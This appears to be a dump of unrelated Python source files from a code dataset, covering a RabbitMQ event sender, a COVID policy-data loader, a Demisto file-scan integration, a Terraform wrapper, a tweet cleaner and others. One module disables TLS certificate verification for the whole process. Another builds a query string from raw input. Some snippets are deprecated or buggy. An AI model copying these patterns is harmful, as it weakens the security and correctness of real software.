id | text | dataset_id
|---|---|---|
133903 | # Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[Summary]
Operations platform integration processing
[Arguments]
HTTP request
[Return value]
HTTP response
"""
import json
import traceback
import requests
import urllib3
import ssl
import pika
import multiprocessing
from urllib3.exceptions import InsecureRequestWarning
from django.conf import settings
from django.urls import reverse
from libs.commonlibs.oase_logger import OaseLogger
from libs.backyardlibs.monitoring_adapter.oase_monitoring_adapter_common_libs import _produce
from libs.backyardlibs.monitoring_adapter.oase_monitoring_adapter_common_libs import _rabbitMQ_conf
from libs.webcommonlibs.events_request import EventsRequestCommon
urllib3.disable_warnings(InsecureRequestWarning)
ssl._create_default_https_context = ssl._create_unverified_context
logger = OaseLogger.get_instance()
# Load configuration settings
_mq_settings = None
# RabbitMQ connection
_channel = None
_connection = None
_properties = None
mq_lock = multiprocessing.Lock()
def send_request(request_data_dic):
"""
[Method summary]
Send pre-formatted bulk data as a request
"""
logger.logic_log('LOSI00001', 'request_data_dic: %s' % len(request_data_dic))
result = True
msg = ''
trace_id_list = []
data_count = 0
try:
data_count = len(request_data_dic['request'])
# Check whether request data exists
if data_count <= 0:
result = False
logger.system_log('LOSM30011')
raise
trace_id_list = EventsRequestCommon.generate_trace_id(req=data_count)
if data_count != len(trace_id_list):
result = False
logger.system_log('LOSM30028')
raise
for i, data in enumerate(request_data_dic['request']):
data['traceid'] = trace_id_list[i]
data = json.dumps(data)
_rabbitMQ_conf()
# Send to RabbitMQ
mq_lock.acquire()
_produce(data)
mq_lock.release()
except Exception as e:
if result:
result = False
logger.system_log('LOSM30010', traceback.format_exc())
logger.logic_log('LOSI00002', 'result: %s' % (result))
return result
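# Usage sketch (added illustration, not part of the original module): the exact event
# schema is an assumption -- the code above only shows that each entry in
# request_data_dic['request'] is a dict that gets a 'traceid' assigned before being
# JSON-encoded and published to RabbitMQ.
# example_payload = {'request': [{'eventinfo': ['sample event']}, {'eventinfo': ['another event']}]}
# send_request(example_payload)  # True if all events were queued, False otherwise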
| StarcoderdataPython |
3281224 | <gh_stars>1-10
def fill_matrix(matrix1,matrix2):
q = 0
matrix_res = []
for i in range(len(matrix1)):
matrix_res.append([])
for z in range(len(matrix1[i])):
matrix_res[i].append(0)
while q < len(matrix1):
matrix_res[i][z] += matrix1[i][q] * matrix2[q][z]
q += 1
q = 0
return matrix_res
def print_cool_matrix(matrix_res):
for i in range(len(matrix_res)):
for z in range(len(matrix_res[i])):
matrix_res[i][z] = str(matrix_res[i][z])
print "\t".join(matrix_res[i])
A = [[2,4],
[3,1]]
B = [[2,1],
[1,3]]
C = fill_matrix(A,B)
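# Worked example (added note): with A and B above the product is
# [[2*2+4*1, 2*1+4*3], [3*2+1*1, 3*1+1*3]] = [[8, 14], [7, 6]].
# assert C == [[8, 14], [7, 6]]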
print_cool_matrix(C)
| StarcoderdataPython |
1743212 | <gh_stars>1-10
import pandas as pd
import re
from .constants import *
import logging
_log = logging.getLogger(__name__)
_OXFORD_PATH = 'https://oxcgrtportal.azurewebsites.net/api/CSVDownload'
COLUMN_NAMES = {
'School closing': 'npi_school_closing',
'Workplace closing': 'npi_workplace_closing',
'Cancel public events': 'npi_cancel_public_events',
'Restrictions on gatherings': 'npi_gatherings_restrictions',
'Close public transport': 'npi_close_public_transport',
'Stay at home requirements': 'npi_stay_at_home',
'Restrictions on internal movement': 'npi_internal_movement_restrictions',
'International travel controls': 'npi_international_travel_controls',
'Income support': 'npi_income_support',
'Debt/contract relief': 'npi_debt_relief',
'Fiscal measures': 'npi_fiscal_measures',
'International support': 'npi_international_support',
'Public information campaigns': 'npi_public_information',
'Testing policy': 'npi_testing_policy',
'Contact tracing': 'npi_contact_tracing',
'Emergency investment in healthcare': 'npi_healthcare_investment',
'Investment in vaccines': 'npi_vaccine_investment',
'StringencyIndex': 'npi_stringency_index'
}
def _load_dataset() -> pd.DataFrame:
_log.info(f'Loading dataset from {_OXFORD_PATH}')
oxford_df = pd.read_csv(_OXFORD_PATH)
oxford_df[DATE_COLUMN_NAME] = pd.to_datetime(oxford_df.Date.astype(str))
df = oxford_df[[c for c in oxford_df.columns if 'Notes' not in c and 'Flag' not in c and 'Unnamed' not in c]].drop(['Date', 'StringencyIndexForDisplay', 'M1_Wildcard'], axis='columns')
df = df.rename(columns={'CountryCode': ISO_COLUMN_NAME})
regex = re.compile(r"[CHE](\d)*_")
df = df.rename(columns={c: regex.sub('', c) for c in df.columns})
_log.info("Loaded")
return df.rename(columns=COLUMN_NAMES)
class OxfordGovernmentPolicyDataset:
"""
Oxford COVID-19 government policy dataset
"""
data = None
def __init__(self, force_load=False):
"""
Loads the dataset and stores it in memory.
Further instances of this class will reuse the same data
:param force_load: If true, forces download of the dataset, even if it was loaded already
"""
# This is to make sure we only load the dataset once during a single session
if OxfordGovernmentPolicyDataset.data is None or force_load:
OxfordGovernmentPolicyDataset.data = _load_dataset()
def get_data(self) -> pd.DataFrame:
"""
Returns the dataset as Pandas dataframe
"""
return OxfordGovernmentPolicyDataset.data
def get_country_data(self, country_or_iso) -> pd.DataFrame:
"""
Returns the dataset for a country as Pandas dataframe
:param country_or_iso: Name or ISO code of the country
"""
return self.data.query(f'CountryName == "{country_or_iso}" or ISO == "{country_or_iso}"')
def get_country_policy_changes(self, country_or_iso) -> pd.DataFrame:
"""
Policy changes for a given country
:param country_or_iso: Name or ISO code of the country
:returns: Pandas dataframe of policy changes
"""
country_df = self.get_country_data(country_or_iso)
country_df = country_df.set_index(DATE_COLUMN_NAME)
country_df = country_df.drop(['ConfirmedCases', 'ConfirmedDeaths'], axis='columns')
policy_changes = ((country_df != country_df.shift(1)) & ~country_df.isna()).iloc[1:]
return policy_changes
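# Usage sketch (added example; assumes the download above succeeds and that the
# constants module defines DATE_COLUMN_NAME / ISO_COLUMN_NAME as used above):
# npi = OxfordGovernmentPolicyDataset()
# kenya = npi.get_country_data('KEN')  # filter by country name or ISO code
# changes = npi.get_country_policy_changes('KEN')  # boolean frame of day-to-day policy changes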
| StarcoderdataPython |
3256838 | <gh_stars>0
from datetime import datetime
from dateutil.tz import tzlocal
import json
import logging
import re
from urllib import urlencode
from urllib2 import urlopen
DATETIME_REGEX = re.compile(r'\D*(\d+)\D*')
logger = logging.getLogger(__name__)
class ODataReader(object):
"""A simple OData reader that is capable of filtering and pagination."""
def __init__(self, service_url):
self.service_url = service_url
def get(self, endpoint, params={}):
"""
Get data from the given service and endpoint.
"""
params.update({ '$format': 'json' })
url = self.service_url + endpoint + '?' + urlencode(params)
return self.get_url(url)
def get_url(self, url):
while True:
# load this url and return results
logger.debug('About to load OData source from url %s' % url)
attempts = 0
response = None
while attempts < 5:
attempts += 1
try:
logger.debug('Attempt #%d to load url %s' %
(attempts, url))
response = json.load(urlopen(url))
break
except Exception:
# Don't bother with looking at HTTP error code: some
# services have returned 500 once, then responded
# successfully after
logger.exception('Exception while loading url: %s' % url)
if not response:
logger.warn('No response after %d attempts' % attempts)
raise StopIteration
for result in response['d']['results']:
yield result
# try to load next url for pagination
try:
url = response['d']['__next']
url += '&' + urlencode({ '$format': 'json' })
except KeyError:
raise StopIteration
@classmethod
def parse_datetime(cls, timestamp):
"""Parse a datetime from an OData feed."""
if not timestamp: return None
timestamp = re.match(DATETIME_REGEX, timestamp).group(1)
return datetime.fromtimestamp(float(timestamp[:-3]), tzlocal())
@classmethod
def format_datetime(cls, dt):
"""Format a datetime into a form recognized in OData filters."""
return "DateTime'%s'" % datetime.isoformat(dt.replace(microsecond=0))
| StarcoderdataPython |
56916 | #!/usr/bin/env python3
# vim: set ft=python:sw=4:ts=4
import os
import sys
# This location is set within the Dockerfile.
sys.path.insert(0, '/opt/infra/lib')
from infra import (
load_definitions_file,
parse_args,
get_org_repo,
cleanup_boilerplate,
write_tf_backend_file,
write_tfvars_file,
run_terraform,
save_outputs,
write_awstf_file,
)
if __name__ == '__main__':
# TODO: Ensure the AWS envvars are set
GLOBALS, SECTIONS = load_definitions_file()
args = parse_args(
legal_sections=SECTIONS.keys(),
)
# TODO: Handle the None,None and the x,'' cases
org, repo = get_org_repo()
# Set ourselves in the right directory. This simplifies the rest of the code
# The directory is either specified in the SECTIONS definition or defaults
# to the section name.
os.chdir(SECTIONS[args.section].get('subdir', args.section))
cleanup_boilerplate()
# There are a very few cases where we don't want to write a TF backend file.
# Specifically, when we're creating the TF backend in the first place.
if not args.no_backend:
write_tf_backend_file(
region=GLOBALS['region'],
bucket=GLOBALS['backend']['bucket_name'],
dynamodb_table=GLOBALS['backend']['dynamodb_table'],
org=org,
repo=repo,
environment=args.environment,
section=args.section,
)
section_values = SECTIONS.get(args.section, {}).get('inputs', {})
tfvars_filename = write_tfvars_file(
GLOBALS=GLOBALS,
# These are the values that all sections must handle
global_values={
"environment": args.environment,
# This will be used by the boilerplate aws.tf file
"region": section_values.get('region', GLOBALS['region']),
},
section_values=section_values,
org=org,
repo=repo,
environment=args.environment,
)
write_awstf_file()
# TODO: Generate the boilerplate aws.tf file with the region variable
# The output subcommand's STDOUT needs to be parseable as JSON.
suppress_verbiage = False
if args.subcmd == 'output':
suppress_verbiage = True
# Always run "terraform init". This is safe.
run_terraform('init',
reconfigure=args.reconfigure,
tfvars_filename=tfvars_filename,
suppress_verbiage=suppress_verbiage,
)
options = []
suppress_input = True
# Force -auto-approve otherwise terraform apply/destroy will error out.
if args.subcmd == 'apply':
options.append('-auto-approve')
elif args.subcmd == 'destroy':
options.append('-auto-approve')
elif args.subcmd == 'output':
# The output subcommand cannot handle the -var-file parameter.
tfvars_filename = None
suppress_input = False
# Always display outputs in JSON
options.append('-json')
# Run the command we were asked to run.
rv = run_terraform(args.subcmd,
options=options,
suppress_input=suppress_input,
tfvars_filename=tfvars_filename,
suppress_verbiage=suppress_verbiage,
)
# TODO: Do something here with rv - it's a CompletedProcess object
# q.v. https://docs.python.org/3/library/subprocess.html#subprocess.CompletedProcess
# TODO: Add a remove_outputs() to be called when destroying
# TODO: Add a read_outputs() to be used when reading
if args.subcmd == 'apply':
save_outputs(
bucket=GLOBALS['backend']['bucket_name'],
org=org,
repo=repo,
environment=args.environment,
section=args.section,
)
cleanup_boilerplate()
# Scripts should be clear when they succeed. A visual statement is helpful.
if not suppress_verbiage:
print("Ok", flush=True)
| StarcoderdataPython |
3343922 | <reponame>ceprio/xl_vb2py
import math, time
def getLatLong():
"Returns URL for day/night picture"
# Define some 'constants'
ClientRecieveTime=time.time() * 1000
# QueryTimeZone = 10
QueryTimeZone = -time.timezone/3600
QueryTimeZoneOffsetMin = QueryTimeZone * 60
NISTSendTimeGMTms = ClientRecieveTime - ( QueryTimeZoneOffsetMin * 60 * 1000 )
# NIST start time in the query time zone
QueryTimeZoneOffset = ( QueryTimeZoneOffsetMin * 60 * 1000 )
# Replace this with "QueryTimeZoneOffset = ( -time.timezone * 60 * 1000 )"
# Client start time in some time zone
ClientRecieveTimems = ClientRecieveTime
# what timezone does your computer think it is? - in minutes
ClientTimeZone = QueryTimeZoneOffsetMin;
ClientNISTDelta = math.floor(NISTSendTimeGMTms - ClientRecieveTimems)
currTime = ClientRecieveTime + ClientNISTDelta # ThisMilliseconds
gmtTime = time.gmtime()
ssue = currTime / 1000
TwoPi = 2 * math.pi
EpochStart = 631065600
DaysSinceEpoch = (ssue - EpochStart)/ (24*3600)
RadsPerDay = TwoPi / 365.242191
Epsilon_g = 279.403303 * (TwoPi / 360)
OmegaBar_g = 282.768422 * (TwoPi / 360)
Eccentricity = 0.016713
MeanObliquity = 23.440592 * (TwoPi / 360);
# Calculate sun_ecliptic_longitude
N = RadsPerDay * DaysSinceEpoch
N = N % TwoPi
if N < 0:
N += TwoPi # This should never be executed, but never mind
M_Sun = N + Epsilon_g - OmegaBar_g
if M_Sun < 0:
M_Sun += TwoPi # This should never be executed either
# Now we solve Kepler's equation. For those who are interested, Kepler's
# equation is all about plotting the orbit of an object on the
# elliptic plane.
E = M_Sun
while 1:
delta = E - (Eccentricity*math.sin(E)) - M_Sun
if (abs(delta) <= 1E-10):
break
E -= delta / (1 - (Eccentricity*math.cos(E)))
# End of the keplers equation solution
myLambda = OmegaBar_g + (2 * math.atan(math.sqrt((1+Eccentricity) / (1-Eccentricity)) * math.tan(E/2)))
# There, finished calculating the sun ecliptic longitude
# Now we calculate the ecliptic to equatorial (something or other)
sin_e = math.sin(MeanObliquity)
cos_e = math.cos(MeanObliquity)
alpha = math.atan2(math.sin(myLambda)*cos_e, math.cos(myLambda))
delta = math.asin(sin_e*math.sin(myLambda));
# End of ecliptic to equatorial
# We calculate the Julian date here, Python could probably do this better
# I leave it to the casual observer to replace the following few lines
y = gmtTime[0] # Year
m = gmtTime[1] # Month number
z = gmtTime[2] # Day number
A = y / 100
B = 2 - A + (A/4)
C = 365.25 * y
D = 30.6001 * (m+1)
JD = B + C + D + z + 1720994.5
T = (JD - 2451545) / 36525
T0 = ((((T + 2.5862E-5) * T) + 2400.051336) * T) + 6.697374558
T0 = T0 % 24
if T0 < 0:
T0 += 24
UT = (float(gmtTime[3])) + ((float(gmtTime[4]) + (float(gmtTime[5]) / 60)) / 60)
T0 += UT * 1.002737909
T0 = T0 % 24
if T0 < 0:
T0 += 24
tmp = alpha - ((TwoPi/24)*T0);
while tmp < -math.pi:
tmp += TwoPi
while tmp > math.pi:
tmp -= TwoPi
# Now calculate our longitude and latitude
lon = tmp * (360/TwoPi)
lat = delta * (360/TwoPi)
# Generate the path of the appropriate xearth image
lon = round(lon)
if (lon % 2 != 0):
if (lon > 0):
lon -= 1
else:
lon += 1
lon = round(lon/2) * 2
if lon <= -181:
lon = -180
if lon >= 181:
lon = 180
# lat is odd
lat = round(lat)
if (lat % 2 == 0):
if lat > 0:
lat -= 1
else:
lat += 1
# Need to do different calculations for negative and positive values of lat
# to emulate the way javascript handles rounding
if lat < 0:
lat = (round(int(lat/2) - 1) * 2) + 1
else:
lat = (round(lat/2 - 1) * 2) + 1
if lat <= -24:
lat = -23
if lat >= 24:
lat = 23
if lat < 0:
latStr = str(int(-lat)) + "S"
else:
latStr = str(int(lat)) + "N"
if lon < 0:
lonStr = str(int(-lon)) + "S"
else:
lonStr = str(int(lon)) + "N"
# url = "http://www.time.gov/" + getLatLong()
# return 'http://www.time.gov/images/xearths/11N/154N.jpg'
return "images/xearths/" + latStr + "/" + lonStr + ".jpg"
| StarcoderdataPython |
199470 | <reponame>diCagri/content
import demistomock as demisto
from CommonServerPython import *
'''IMPORTS'''
import requests
import base64
# disable insecure warnings
requests.packages.urllib3.disable_warnings()
'''INTEGRATION PARAMS'''
API_TOKEN = demisto.params().get('apitoken')
URL_BASE = demisto.params().get('url')
USE_PROXY = demisto.params().get('proxy', False)
UNSECURE = not demisto.params().get('insecure', False)
'''CONSTANTS'''
READ_BINARY_MODE = 'rb'
SLASH = '/'
SCAN_FILE_URL = 'direct/scan/file/'
GET_FILE_VERDICT_URL = 'direct/verdict/?hash={}'
TOKEN_PREFIX = 'Bearer' # guardrails-disable-line
RESPONSE_CODE_OK = 200
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_DONE = 'DONE'
AUTH_HEADERS = {
'Authorization': "{} {}".format(TOKEN_PREFIX, API_TOKEN)
}
VERDICT_SCANNING = 'Scanning'
VERDICT_MALICIOUS = 'Malicious'
VERDICT_APPROVED = 'Approved'
VERDICT_ERROR = 'Error'
VERDICT_BENIGN = 'Benign'
VERDICT_TIMEOUT = 'Timeout'
SCAN_ONGOING = 'Still scanning...'
BITDAM_COMMAND_PREFIX = 'bitdam'
DBOTSCORE_UNKNOWN = 0
DBOTSCORE_CLEAN = 1
DBOTSCORE_MALICIOUS = 3
'''HANDLE PROXY'''
handle_proxy()
'''HELPER FUNCTIONS'''
def get_file_bytes(entry_id):
get_file_path_res = demisto.getFilePath(entry_id)
file_path = get_file_path_res["path"]
with open(file_path, READ_BINARY_MODE) as fopen:
bytes = fopen.read()
return base64.b64encode(bytes)
def get_url_base_with_trailing_slash():
'''
Returns the integration's base url parameter, making sure it contains a trailing slash
'''
url_base = URL_BASE
return url_base if url_base.endswith(SLASH) else url_base + SLASH
def build_json_response(content, context, human_readable):
return {
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': content,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(human_readable, content),
'EntryContext': context
}
def get_file_name(entry_id):
get_file_path_res = demisto.getFilePath(entry_id)
return get_file_path_res["name"]
def verdict_to_dbotscore(verdict):
if VERDICT_APPROVED == verdict:
return DBOTSCORE_CLEAN
elif VERDICT_MALICIOUS == verdict:
return DBOTSCORE_MALICIOUS
elif VERDICT_SCANNING == verdict:
return DBOTSCORE_UNKNOWN
else:
return DBOTSCORE_UNKNOWN
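# Added note: DBot scores map to Cortex XSOAR reputation levels -- 0 unknown,
# 1 good/clean, 3 bad/malicious -- which is why VERDICT_APPROVED becomes 1 and
# VERDICT_MALICIOUS becomes 3 above.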
'''API_IMPL'''
def scan_file():
response = scan_file_command()
returned_sha1 = parse_scan_file_response(response)
# Build demisto response
response_content = {'SHA1': returned_sha1}
response_context = {'BitDam': {'FileScan': {'SHA1': returned_sha1}}}
return build_json_response(response_content, response_context, "File was submitted successfully")
def scan_file_command():
# Get data to build the request
entry_id = demisto.args().get('entryId')
file_name = get_file_name(entry_id)
file_bytes = get_file_bytes(entry_id)
json_data = {'file_name': file_name,
'file_data_base64': base64.b64encode(file_bytes)}
raw_json = json.dumps(json_data, ensure_ascii=False)
url = "{}{}".format(get_url_base_with_trailing_slash(), SCAN_FILE_URL)
# Send the HTTP request
response = requests.post(url, data=raw_json, headers=AUTH_HEADERS, verify=UNSECURE)
return response
def parse_scan_file_response(response):
# Parse response
if RESPONSE_CODE_OK != response.status_code:
raise Exception("Scan file failed. Response code -{}, Data- '{}'".format(str(response.status_code), response.content))
response_json = json.loads(response.content)
if 'sha1' not in response_json:
raise Exception(
"Scan file failed. Bad response json - {}".format(response.content))
returned_sha1 = response_json['sha1']
return returned_sha1
def get_file_verdict():
identifier_value = demisto.args().get('idValue')
response = get_file_verdict_command(identifier_value)
verdict, status = parse_get_file_verdict_response(response)
response_content = {'STATUS': status,
'VERDICT': verdict,
'ID': identifier_value}
context = {}
context['BitDam.Analysis(val.ID && val.ID == obj.ID)'] = {
'Status': status,
'Verdict': verdict,
'ID': identifier_value
}
if VERDICT_MALICIOUS == verdict:
context[outputPaths['file']] = {'SHA1': identifier_value}
context[outputPaths['file']]['Malicious'] = {
'Vendor': 'BitDam',
'Description': 'Process whitelist inconsistency by bitdam-get-file-verdict',
'Name': identifier_value
}
dbotscore = verdict_to_dbotscore(verdict)
if dbotscore:
context[outputPaths['dbotscore']] = {
'Indicator': identifier_value,
'Type': 'File',
'Vendor': 'BitDam',
'Score': dbotscore
}
response_context = context
return build_json_response(response_content, response_context,
"Get file verdict was performed successfully")
def parse_get_file_verdict_response(response):
# Parse results
if RESPONSE_CODE_OK != response.status_code:
raise Exception("Get file verdict failed. Response code -{}, Data- '{}'".format(str(response.status_code),
response.content))
response_json = json.loads(response.content)
status = ''
verdict = ''
if 'scan_data' not in response_json or 'verdict' not in response_json['scan_data']:
raise Exception("Get file verdict failed. Unknown response schema. Data- '{}'".format(response.content))
verdict = response_json['scan_data']['verdict']
if verdict == SCAN_ONGOING or verdict == VERDICT_SCANNING:
# Still in progress
verdict = VERDICT_SCANNING
status = STATUS_IN_PROGRESS
else:
status = STATUS_DONE
return verdict, status
def get_file_verdict_command(identifier_value):
# Get data to build the request
scan_file_relative_url_formatted = GET_FILE_VERDICT_URL.format(identifier_value)
url = "{}{}".format(get_url_base_with_trailing_slash(), scan_file_relative_url_formatted)
# Send the request
response = requests.get(url, headers=AUTH_HEADERS, verify=UNSECURE)
return response
def upload_test_file_to_scan():
d = {
"file_name": "demisto.txt",
"file_data_base64": 'ZGVtaXN0bw=='
}
url = "{}{}".format(get_url_base_with_trailing_slash(), SCAN_FILE_URL)
response = requests.post(url, headers=AUTH_HEADERS, json=d, verify=UNSECURE)
return response
def test_module():
response = upload_test_file_to_scan()
if RESPONSE_CODE_OK == response.status_code:
return True
raise Exception("Status code - {}, Error- '{}'".format(str(response.status_code),
response.content))
'''COMMAND_CLASIFIER'''
try:
if demisto.command() == 'test-module':
# This is the call made when pressing the integration test button.
if test_module():
demisto.results('ok')
sys.exit(0)
elif demisto.command() == 'bitdam-upload-file':
demisto.results(scan_file())
elif demisto.command() == 'bitdam-get-verdict':
demisto.results(get_file_verdict())
except Exception as e:
LOG(e)
return_error("Error: {}".format(str(e)))
| StarcoderdataPython |
19330 | <filename>site_crawler/cleaner/cleaner.py<gh_stars>10-100
import csv
import re
import string
import html
class Cleaner:
def __init__(self):
self.remove_punctuations = str.maketrans('', '', string.punctuation)
def read_csv(self,csv_name):
cleaned_text = []
with open('../data/twitter_data/raw_data/'+csv_name+'.csv', newline='', encoding='utf-8') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
text = row['text']
clean_text = self.clean_tweets(text)
cleaned_text.append(clean_text)
self.save_cleaned_csv('cleaned_'+csv_name,cleaned_text)
def clean_tweets(self,tweet):
# harmonize the cases
lower_case_text = tweet.lower()
# remove urls
removed_url = re.sub(r'http\S+', '', lower_case_text)
# remove hashtags
removed_hash_tag = re.sub(r'#\w*', '', removed_url) # hastag
# remove usernames from tweets
removed_username = re.sub(r'@\w*\s?','',removed_hash_tag)
# remove retweet marker
removed_retweet = removed_username.replace("rt", "", 1) # remove the first "rt" occurrence (retweet marker)
# removing punctuations
removed_punctuation = removed_retweet.translate(self.remove_punctuations)
# remove leftover ">" and "&" characters from HTML entities
remove_g_t = removed_punctuation.replace(">", "", True)
remove_a_m_p = remove_g_t.replace("&", "", True)
final_text = remove_a_m_p
return final_text
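# Example (added note, traced by hand from the steps above): a tweet such as
# "RT @alice Check this out! #Python3 https://t.co/abc" comes back as roughly
# " check this out " -- the url, hashtag, mention, leading "rt" and punctuation are
# removed, while leftover whitespace is not trimmed.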
def pre_cleaning(self,text):
html_escaped = html.unescape(text)
final_text = html_escaped.replace(';','')
return final_text
def pre_labeling(self,text):
lower_case_text = text.lower()
removed_url = re.sub(r'http\S+', '', lower_case_text)
return removed_url
def save_cleaned_csv(self,name,tweets_list):
with open('../data/twitter_data/cleaned_data/' + name + '.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["text"])
for tweet in tweets_list:
writer.writerow([tweet,])
pass
def save_pre_labled_csv(self,csv_name):
cleaned_text = []
with open('../data/twitter_data/raw_data/' + csv_name + '.csv', newline='', encoding='utf-8') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
text = row['text']
clean_text = self.pre_labeling(text)
cleaned_text.append(clean_text)
self.save_pre_labeled_csv('unlabeled_' + csv_name, cleaned_text)
def save_pre_labeled_csv(self,name,tweets_list):
with open('../data/twitter_data/pre_labeled/' + name + '.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["text","label"])
for tweet in tweets_list:
writer.writerow([tweet,])
pass
if __name__ == "__main__":
c = Cleaner()
tweets_csvs = [
'Business_KE',
'MadeItInAfrica',
'IFCAfrica',
'africareview',
'AfDB_Group',
'_AfricanUnion',
'Taifa_Leo',
'BD_Africa',
'RadioCitizenFM',
'citizentvkenya',
'KTNKenya',
'K24Tv',
'StandardKenya',
'TheStarKenya',
'radiomaisha',
'KBCChannel1',
'CapitalFMKenya',
'African_Markets',
'Africafinancial',
'InvestInAfrica',
'AfricanInvestor',
'forbesafrica',
'cnbcafrica',
'BBCAfrica',
'CNNAfrica',
'allafrica',
'ReutersAfrica',
'VenturesAfrica',
'BBGAfrica',
'GhettoRadio895',
'kenyanwalstreet',
'SokoAnalyst',
'NSEKenya',
'wazua'
]
for tweets_csv in tweets_csvs:
c.save_pre_labled_csv(tweets_csv)
| StarcoderdataPython |
3233516 | <filename>pandas1 - Introduction to Pandas/pandas2 - DataFrame Structure.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue May 16 15:58:26 2017
@author: azkei
The DataFrame is a tabular data structure similar to the spreadsheet.
This data structure is designed to extend the case of the Series to multiple dimensions.
The DataFrame consists of an ordered collection of columns each of which can
contain value of diferent types (numeric,string,boolean,etc) and an index
"""
# 1. Defining a DataFrame
# Here we are defining the column and the values on the column
data = {'color':['blue','green','yellow','red','white'],
'object':['ball','pen','pencil','paper','mug'],
'price':['1.2','1.3','1.4','1.5','1.6']}
frame = pd.DataFrame(data)
frame
# If the data contains more columns than we are interested in, we can make a selection
frame2 = pd.DataFrame(data, columns = ['object','price'])
frame2
# Specifying the index on the DataFrame - or else it will be numerical type
frame2 = pd.DataFrame(data,index=['one','two','three','four','five'])
frame2
# Generating numbers into DataFrames, assigning the index and columns
frame3 = pd.DataFrame(np.arange(16).reshape((4,4)),
index = ['red','blue','yellow','white'],
columns = ['ball','pen','pencil','paper'])
frame3
# 2. Selecting Elements
# If we want to know the names of the columns
frame.columns
# If we want to get the indexes
frame.index
# Regarding the values contained within the data structure,
# we can get the entire set of data using the values attribute
frame.values
# If we want to select the values in the column
frame['price']
# As you can see, the return value is a Series object.
# Another way is to use the column name as an attribute of the instance of the
# DataFrame
frame.price
# If we want to extract a row of the DataFrame,
# pass its index to the ix() function
frame.ix[2]
# To select multiple rows - specify more index values
frame.ix[[2,4,1,3]]
# Extracting a portion from a DataFrame
frame[0:1]
frame[1:3]
# Accessing a single value in a DataFrame - use the column name and the row index
frame['object'][3]
# 3. Assigning Values
# Giving the index a name
# Giving the column index a name
frame.index.name = 'id'; frame.columns.name = 'item'
frame
# Adding a new column to the DataFrame
frame['new'] = 12
frame
# Updating the new column contents
frame['new'] = [3.0, 1.3, 2.2, 0.8, 1.1]
frame
# Adding a Series as a new column of the DataFrame
# Generating Series
ser = pd.Series(np.arange(5))
ser
# Adding the Series into the frame column
frame['new'] = ser
frame
# Changing single value, select item and assign new value
frame['price'][2] = 3.3
# 4. Membership of a Value
# Check if these values are in the DataFrame
# True/False
frame.isin([1.5,'pen'])
# Nan
frame[frame.isin([1.0,'pen'])]
# 5. Deleting a Column
del frame['new']
frame
# 6. Filtering
# Return values less than 12
frame[frame < 12]
# 7. DataFrame from Nested Dict
# Generate Nested Dictionary
nestdict = {'red':{ 2012: 22, 2013: 33},
'white':{2011: 13, 2012: 22, 2013:16},
'blue':{2011:17, 2012:27, 2013:18}}
# Place nested dictionary into DataFrame
frame2 = pd.DataFrame(nestdict)
# As you can see Pandas is able to compensate for missing data
# 8. Transposition of a DataFrame
# Columns become rows, rows become columns
frame2.T | StarcoderdataPython |
1778011 | import numpy as np
from scipy.stats import cauchy
import matplotlib.pyplot as plt
n = 1000
distribution = cauchy()
fig, ax = plt.subplots()
data = distribution.rvs(n)
if 0:
ax.plot(list(range(n)), data, 'bo', alpha=0.5)
ax.vlines(list(range(n)), 0, data, lw=0.2)
ax.set_title("{} observations from the Cauchy distribution".format(n))
if 1:
# == Compute sample mean at each n == #
sample_mean = np.empty(n)
for i in range(n):
sample_mean[i] = np.mean(data[:i+1])
# == Plot == #
ax.plot(list(range(n)), sample_mean, 'r-', lw=3, alpha=0.6,
label=r'$\bar X_n$')
ax.plot(list(range(n)), [0] * n, 'k--', lw=0.5)
ax.legend()
fig.show()
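# Added note: the running mean never settles because the Cauchy distribution has no
# finite mean, so the law of large numbers does not apply. A quick contrast (sketch):
# normal_data = np.random.randn(n)
# normal_means = np.cumsum(normal_data) / np.arange(1, n + 1)
# plotting normal_means the same way shows convergence toward 0.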
| StarcoderdataPython |
3230375 | <gh_stars>0
# Copyright 2016 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""nsxv_security_group_logging
Revision ID: <PASSWORD>
Revises: <PASSWORD>
Create Date: 2016-03-24 06:06:06.680092
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5ed1ffbc<PASSWORD>a'
down_revision = '3c88bdea3054'
depends_on = ('3e4dccfe6fb4',)
def upgrade():
secgroup_prop_table = sa.Table(
'nsx_extended_security_group_properties',
sa.MetaData(),
sa.Column('security_group_id', sa.String(36), nullable=False),
sa.Column('logging', sa.Boolean(), nullable=False))
op.bulk_insert(secgroup_prop_table, get_values())
op.drop_column('nsxv_security_group_section_mappings', 'logging')
def get_values():
values = []
session = sa.orm.Session(bind=op.get_bind())
section_mapping_table = sa.Table('nsxv_security_group_section_mappings',
sa.MetaData(),
sa.Column('neutron_id', sa.String(36)),
sa.Column('logging', sa.Boolean(),
nullable=False))
secgroup_table = sa.Table('securitygroups',
sa.MetaData(),
sa.Column('id', sa.String(36)))
# If we run NSX-V plugin then we want the current values for security-group
# logging, taken from the section mapping table.
for row in session.query(section_mapping_table).all():
values.append({'security_group_id': row.neutron_id,
'logging': row.logging})
# If we run NSX-V3 plugin then previous table is empty, since
# security-group logging isn't supported on previous versions, we set the
# current value to false (the default).
if not values:
for row in session.query(secgroup_table).all():
values.append({'security_group_id': row.id,
'logging': False})
session.commit()
return values
| StarcoderdataPython |
129840 | from copy import deepcopy
def get_median(values):
"""
